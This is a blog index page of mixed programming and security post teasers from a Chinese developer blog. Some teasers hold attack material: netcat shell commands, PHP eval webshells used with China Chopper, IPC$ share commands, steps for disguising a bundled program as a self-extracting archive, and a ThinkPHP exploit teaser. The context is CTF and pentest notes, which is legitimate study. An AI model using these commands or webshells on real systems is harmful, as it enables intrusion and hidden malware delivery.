- 博客(101)
- 资源 (1)
- 收藏
- 关注
RSS订阅
原创 PCL点云处理方法
首先介绍一下点云的使用方法,ubuntu.04安装好pcl库之后,在安装目录pcl1.8/doc/tutorials有许多相关基本操作的使用教程,使用方法(在ubuntu14.04环境下编译运行方法): cd catkin_ws/src/ catkin_create_pkg demo std_msgs rospy roscpp cloud_viewer.cpp文件...
2018-07-09 15:39:13
7946
6
原创 ROS下安装使用kinect2
使用相机难免少不了标定,ros下有标定kinect深度相机和彩色相机的方法,就在ros下趟一遍坑,特此记录:1. 安装libfreenect2 libfreenect2为Kinect2提供了一个开源驱动程序,这个驱动并不支持xbox one,.同事也提供了深度图像传输以及RGB图像的联合配准. 安装步骤(我选择安装在home目录下): ...
2018-07-04 09:38:50
4377
原创 CANOPEN详解
canopen简介:CAN 提供了所有的网络管理服务和报文传送协议,但并没有定义对象的内容或者正在通讯的对象的类 型(它只定义了 how,没有定义 what),而这正是 CANopen 切入点。CANopen 的核心概念是设备对象字典(OD:Object Dictionary)。CANopen 通讯通过对象字典(OD)能够访问驱动器的所有参数。 can的数据帧结构: cano...
2018-06-11 15:50:33
81153
6
原创 tensorflow目标检测API实现
tensorflow目标检测API实现(windows环境) 1下载Anaconda(https://repo.continuum.io/archive/Anaconda3-4.2.0-Windows-x86_64.exe) 安装Anconda3-4.2.0,集成python3.5.2。全程一键安装,遇到需要添加环境变量的,允许即可.然后一路安装就可以了。 安装完成后就会有上面这些应用程序,
2018-01-06 18:59:03
2721
原创 shiro内置过滤器学习记录
shiro是个认证权限框架,除了登录、退出逻辑我们需要加入项目代码之外,验证用户是否已经登录、是否拥有权限的代码其实都是过滤器来完成的,可以这么说,shiro其实就是一个过滤器链集合。当运行web应用程序时,Shiro将创建一些有用的默认过滤器实例,并使它们在[main]部分自动可用。您可以像配置任何其他bean一样在main中配置它们,并在链定义中引用它们。默认筛选器实例由DefaultFilter enum中定义public enum DefaultFilter { anon(Anony
2022-03-18 23:03:00
673
原创 SSH反向代理使用
SSH反向代理先说说什么是代理,源服务器由于各种原因无法访问目标服务器提供的服务,但是存在一个agent服务器,源服务器可以访问它,它可以访问目标服务器,那么源服务器的消息发给他,它在把请求转发给目标服务器,就间接的实现了源服务器访问目标服务器的目的。这就是代理,也是一般所说的正向代理,正向代理一般是代理客户端(源服务器,信息的请求者)。这时候,在公网上发送的信息的请求者就是代理服务器的身份,而不是真正客户端的身份。好处显而易见,隐藏客户端的身份。反向代理百度百科:当一个代理服务器能够代理外部网络
2022-02-09 21:49:44
5269
2
原创 misc总结
1.uncompyle2是Python2.7的反编译工具,它可以把python生成的pyo、pyc字节码文件反编译为十分完美的源码,并可以将反编译后的源码再次生成字节码文件安装方法:git clone https://github.com/wibiti/uncompyle2cd uncompyle2python setup.py install使用方法示例:使用帮助:uncompyle2 -h查看了帮助会觉得里面操作有点麻烦,就是-o outfile必须先写,例如有一个pcat.pyc,想
2022-01-27 22:31:13
454
原创 “法外狂徒”张三经典语录
1、我们登上并非我们选择的舞台,演出并非我们选择的剧本2、若非命运的加持,年少时的梦想,不值一提(??)3、昨天已是历史,明天是个谜团,今天是天赐的礼物–《功夫熊猫》4、不要患得患失,在意从前又担忧未来5、已知黎明将至,抬头尽是朝阳...
2022-01-18 22:33:32
5800
原创 通过syslog转发apache日志配置
OSSIM收集apache日志syslog日志格式介绍:1、发送端配置-t,指定标记记录在message日志中可以看到是属于哪个模块记录的日志,-t后面为模块名称,加引号或不加都可以。如果不指定-t,都是已root为记录。-p,指定输入消息日志级别,优先级可以是数字或者指定为 " facility.level" 的格式。比如:" -p local3.info " local3 这个设备的消息级别为 info参考链接:https://www.cnblogs.com/xingmuxin/p/86
2022-01-16 23:01:58
1485
1
原创 5G-UE注册流程
以首次入网用户的初始注册流程进行说明:信令解析Step1 Register Request: UE -> gNB类型为InitialRegistrationSUCI。在5G中的SUPI相当于LTE中的IMSI,但是和IMSI不同的是,该用户永久身份信息永远不会出现的空口上,在以往使用IMSI的场合(如初次registration,Identify procedure等)中使用SUCI替代。所谓的SUCI就是SUPI的加密版本,能保证空口SUPI不被泄露,还保证了UE和网络的鉴权的正常进行。
2021-08-13 23:05:44
1982
原创 利用wnirar制作自解压捆绑软件
步骤一:下载winrar软件步骤二:填写自解压路径,windows推荐路径为:C:\Windows\TAPI步骤三:填写自解压后要运行的程序步骤四:生成程序步骤五:使用Resourcehacker对步骤四生成的exe文件静态字眼进行修改,icon修改图标(使用icon格式图片,忽略报错,保存即可)...
2021-08-10 19:56:12
516
原创 shodan信息收集基础操作
shodan主要用于搜索网络设备:webcam,路由器,服务器,IOT设备等基础搜索命令:country:chinacity:nanjingport:22os:Windows xpdevice:webcam,switchhas_vuln:true在命令框中的组合以空格符隔开查询主机信息:ping www.baidu.com得到域名对应的IP然后搜索host:ip即可...
2021-08-08 23:02:30
509
原创 2021高考志愿填报总结-yy
针对自己于2021年因志愿填报引起的一系列琐事及不便有以下两条总结:1:高考前要建立合适目标(一本,500+)为之努力进取以保证不会因分数原因致使自己处于尴尬的处境。2:高考成绩出来后至填报志愿空档期期间要积极查询学校及有关专业等相关信息*【学费、学校评论、地理位置、大小、便利程度、学校制度等】并将学校组织对比,保证不会像2021年一样因学校问题而不想去上而致使麻烦出现。以上为2021年高考后所引起的问题所作总结,目的是引以为戒并从中汲取经验以避免不必要的麻烦再度出现。
2021-08-02 21:50:52
212
原创 centos包冲突问题解决
在centos7上通过yum install安装包报如下错误:解决办法:下载(http://rpm.pbone.net)配套的如下RPM包最后通过命令rpm -Uvh --oldpackage 包1 包2安装即可尽量不要强制卸载软件包
2021-05-16 10:05:18
1016
原创 渗透测试小经验(一)
一、信息收集nmap扫描二、漏洞利用tips测试端口是否开放:telnet IP portnc -nv IP port漏洞利用之IPC$前提:假设设置了文件共享,将远程共享文件夹当做本地的F盘net use f: \10.235.15.2\share 远程密码 /user:用户查看列表net use删除net use f: /delnet use * /del访问远程其他盘net use f: \10.235.15.2\c$ 远程密码 /user:用户...
2021-05-09 22:16:26
660
原创 PE文件windows加载执行过程
Windows进程创建过程第一阶段:打开目标映像文件,创建Section由CreateProcess函数完成字符串采用ASCII字符,则使用CreateProcessA函数字符串采用Unicode字符,则使用CreateProcessW函数由于windows内部都是Unicode字符,所以CreateProcessA函数只是将ASCII字符转换成Unicode字符后继续调用的CreateProcessW函数CreateProcess函数步骤:1.检查PE文件的有效性2.为PE文件分配Sect
2021-03-21 15:52:41
1147
原创 centos下mongodb快速入门
MongoDB 简介MongoDB 是由C++语言编写的,是一个基于分布式文件存储的开源数据库系统。MongoDB 是一个介于关系数据库和非关系数据库之间的产品,是非关系数据库当中功能最丰富,最像关系数据库的。MongoDB 启动启动mongodb并指定配置文件mongod --config /etc/mongodb.conf后台启动mongodb并指定配置文件mongod -f /etc/mongodb.conf通过 shell 连接 MongoDB 服务:$ ./mongoMongo
2021-03-15 23:03:00
227
原创 内存映射--学习积累
当CPU读取数据时,是由内存管理单元(MMU)管理的。MMU位于CPU与物理内存之间,它包含从虚地址向物理内存地址转化的映射信息。mmap将一个文件或者其它对象映射进内存。文件被映射到多个页上,如果文件的大小不是所有页的大小之和,最后一个页不被使用的空间将会清零。 munmap执行相反的操作,删除特定地址区域的对象映射。PE文件的结构在磁盘和内存中是基本一样的,但在装入内存中时又不是完全复制。Windows装载器在装载的时候仅仅建立好虚拟地址和PE文件之间的映射关系,只有真正执行到某个内存页中的指令或访
2021-03-14 22:40:43
86
原创 恶意代码分析总结
寄存器类型:1、CS:代码段寄存器;2、DS:数据段寄存器;3、SS:堆栈段寄存器;4、FS:标志段寄存器5、GS:全局段寄存器6、ES:扩展段寄存器通过读取FS寄存器指定的内存可以获得很多系统关键信息,内核态是fs = 0x30,用户态 fs = 0x3B,fs在内核态指向_KPCR,用户态指向_TEB。TEB(Thread Environment Block),线程环境块,也就是说每一个线程都会有TEB,用于保存系统与线程之间的数据,便于操作控制。那么Fs:[0x30]就是PEB进程环境
2021-03-04 22:29:23
371
原创 tcpreplay重放pcap包
Tcpreplay是一种pcap包的重放工具, 它可以将tcpdump和Ethereal/Wireshark等工具捕捉到的网络流量包进行编辑修改和重放. tcpreplay -t -v --intf1=em1 sample.pcap 其中:-t 表示以最快的速度重放数据包-v表示打印数据包细节–intf1指定使用那一个网卡发送数据包-x 重放倍率,比如1倍速率,2倍速率–loop /-l 重放多少次简单命令tcpreplay -i eth0 chat.pcap...
2021-02-24 22:48:24
2143
原创 内网渗透之反弹shell
蚕吐丝,蜂酿蜜,人不学,不如物!场景1步骤一:将被控服务器shell反弹到本地的4444端口,并监听4444端口(受害机输入)nc -lvp 4444 -e cmd.exe (反弹windows shell)nc -lvp 4444 -e /bin/bash (反弹linux shell)步骤二:攻击机连接被控服务器的4444端口(攻击机输入)nc -nv 受害机ip 4444场景22利用nc反弹shell条件:防火墙开启,不允许访问目标端口(可直接关闭目标机防火墙,权限
2021-01-31 21:48:34
859
原创 ctf中pwn题目总结
1.安装pip install pwntools (python2)pip3 install pwntools (python3)2.使用Context设置context是pwntools用来设置环境的功能。在很多时候,由于二进制文件的情况不同,我们可能需要进行一些环境设置才能够正常运行exp,比如有一些需要进行汇编,但是32的汇编和64的汇编不同,如果不设置context会导致一些问题。一般来说我们设置context只需要简单的一句话:context(os='linux', arch='amd
2020-11-16 23:25:58
4613
原创 IDA PRO7.0安装及问题解决
1.安装,下载IDA7.0(便携版,免安装)链接:https://pan.baidu.com/s/1_jb9WWWUlXbCrHUMbn7ZJQ提取码:au7t2.安装keystone-0.9.1-python-win64,点击下载2.打开IDA是碰到问题keypatch.py ERROR: fail to load the dynamic library解决方法:On Windows, if you get an error message from IDA about “fail to l
2020-11-15 14:20:35
5802
原创 ThinkPHP漏洞利用
漏洞标志影响版本ThinkPHP 5.0.x ~ 5.0.23ThinkPHP 5.1.x ~ 5.1.31漏洞利用先查看版本号。在网址上随意输入一个不存在的模块 地址:可以看到,thinkphp 版本为 5.0.20查看信息漏洞利用大致原理:漏洞程序未对控制器进行过滤,导致攻击者可以通过引入\符号来调用任意类方法。详情参考:https://www.cnblogs.com/backlion/p/10106676.html初步利用代码如下:index.php?s..
2020-10-11 10:45:19
1457
原创 git代码管理工具快速上手
Git简介Git是当今最先进的分布式版本管理系统,是Linus花了两周时间自己用C写成的。相比集中式管理系统SVN,Git可以离线管理你的代码,不用依赖于网速。而且,Git有相当强大的分支管理,这是其他代码管理系统所不具备的。Git 中所有数据在存储前都计算校验和,保证了数据的完整与唯一性。Workspace:工作区Index / Stage:暂存区Repository:仓库区(或本地仓库)Remote:远程仓库git可以管理的仓库目录下多了一个.git的目录,这个目录是Git来跟踪管理版本的
2020-08-14 00:18:26
120
原创 splunk总结
1.不同版本splunk下载https://www.splunk.com/page/previous_releases#x86_64windows2.插件下载地址:https://splunkbase.splunk.com/apps/3.github介绍https://github.com/olafhartong/ThreatHunting4.word版详细教程https://www.linkedin.com/pulse/attckized-splunk-kirtar-oza-cissp-ci
2020-07-02 23:50:00
263
原创 ctf-misc总结(二)
文章目录1.已知n,c,e,求m2.已知n,c,e=3,爆破3.广播攻击,已知多组n和c4.模不互素,已知两组n,c,e5.共模攻击,已知两组n,c,e,其中n相同6.wiener_attack7.已知n,e,c和nextprime(p)*nextprime(q)8.dp泄露( dp = d%(p-1))9.私钥d低一半比特泄露攻击half_d词频分析:https://quipqiup.com/https://www.guballa.de/vigenere-solverRSA题目from pwn
2020-05-12 22:46:11
2556
原创 vbox设置kali虚拟机与主机共享文件夹
1.vbox设置共享文件夹如下图2.在kali虚拟机里面创建一个文件夹,例如/mnt/kali_shared,执行如下命令:sudo mount -t vboxsf kali_shared /mnt/kali_shared-t vboxsf 指定文件系统的类型我之前设置的共享文件夹名称为shared,如果删除共享文件夹直接执行删除命令的话会报错首先要卸载共享文件夹执行命令sudo umount -t vboxsf kali_share /mnt/shared卸载共享文件夹的话输入命令su
2020-05-12 00:11:00
894
原创 ctf-misc总结(一)
1.PNG图片处理:发现数据块异常使用stegsolve分析根据块大小找到块的CRC码,根据校验码在winhex中搜索复制出异常的数据块789C5D91011280400802BF04FFFF5C75294B5537738A21A27D1E49CFD17DB3937A92E7E603880A6D485100901FB0410153350DE83112EA2D51C54CE2E585B15A2FC78E8872F51C6FC1881882F93D372DEF78E665B0C36C529622A0A4
2020-05-10 21:20:47
4359
原创 CTF-WEB总结(四-题目来源i春秋)
Web总结:1.网页源代码查看即使浏览器不设置 直接访问此链接也可以看到原代码,后来发现其他网页也是如此, 所以破解方法有三个一个是直接F12查看元素可以看到一个是设置浏览器关闭js一个是直接在链接前加view-source 注意看原代码的链接:view-source:http://159.138.137.79:55803/2.直接在链接后加/robots.txt,这边记录了爬虫...
2020-05-07 23:01:25
5162
原创 ctf中国菜刀连接一句话木马
中国菜刀下载地址,试了好几个版本的就这个好用:https://pan.baidu.com/share/link?shareid=871753024&uk=388464620上传一句话木马:<?php @eval($_POST['hacker'])?>将一句话木马另存为one.jpg,通过Burp抓包改包上传为one.php通过菜刀连接:在空白位置右键-》添加...
2020-05-06 22:29:10
6695
原创 CTF-WEB总结(三)
Php一句话木马:<?php eval($_post['cmd']);?>一句话:<?php eval($_post['cmd']);?>代码执行函数eval,assert,preg_replace, array_map等命令执行函数system,exec, passthru 等根据waf白名单拼接字符串?c=$pi=(is_nan^(6).(...
2020-05-03 16:17:47
945
原创 CTF-WEB总结之SQL注入
简介SQL注入漏洞的原理是由于开发者在编写操作数据库代码时,直接将外部可控的参数拼接到SQL语句中,没有经过任何过滤或过滤不严谨,导致攻击者可以使恶意语句在数据库引擎中执行。Union注入利用内置函数爆数据库信息及相关信息version()database()user()current_user()@@datadir数据库路径@@basedir mysql安装路径@@ver...
2020-05-01 18:18:21
675
原创 CTF-WEB总结之SSRF利用
1、dirsearch目录扫描看不到内容是由于php的<被当做一个注释。php的格式<?php...?>通过dict协议探测端口
2020-05-01 16:13:13
2482
1
原创 CTF密码学部分知识总结(二)
目录1.低指数攻击2.Rabin攻击(e=2,n可分解)3.低指数广播攻击(多组c和n,e相同)4.Wiener攻击(e很大)5.Boneh and Durfee attack6.Related Message Attack(e=3)7.Coppersmith's short-pad attack(e!=3)8.Coppersmith定理攻击(知道部分P)9.共模攻击10.共享素数攻击(多组n和c...
2020-04-28 23:45:14
2631
原创 CTF密码学部分知识总结(一)
1.凯撒密码(Caesar)#!/usr/bin/python-- coding=utf --def caesar(cipher):for j in range(26):str_list = list(cipher)i = 0while i < len(cipher):if not str_list[i].isalpha():str_list[i] = str_list[i...
2020-04-27 23:28:04
5356
原创 gmpy2安装教程
最近练习ctf密码学部分的题目会经常用到gmpy2这个Python 扩展库。它的前身是gmpy,经过其作者的调整和封装,使得gmpy2的使用大大简化。GMP(GNU Multiple Precision Arithmetic Library,即GNU高精度算术运算库),它是一个开源的高精度运算库,其中不但有普通的整数、实数、浮点数的高精度运算,还有随机数生成,尤其是提供了非常完备的数论中的运算接口...
2020-04-26 19:50:33
13163
原创 Linux 之间复制文件和目录
今天发现了一个linux之间传输文件的趁手工具scp。scp 是 secure copy 的缩写, scp 是 linux 系统下基于 ssh 登陆进行安全的远程文件拷贝命令。scp 是加密的,rcp 是不加密的,scp 是 rcp 的加强版。SCP用于 Linux 之间复制文件和目录的操作命令如下:1、从远程复制到本地从远程复制到本地,如下实例应用实例:scp root@runoob....
2020-04-22 22:21:56
272
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人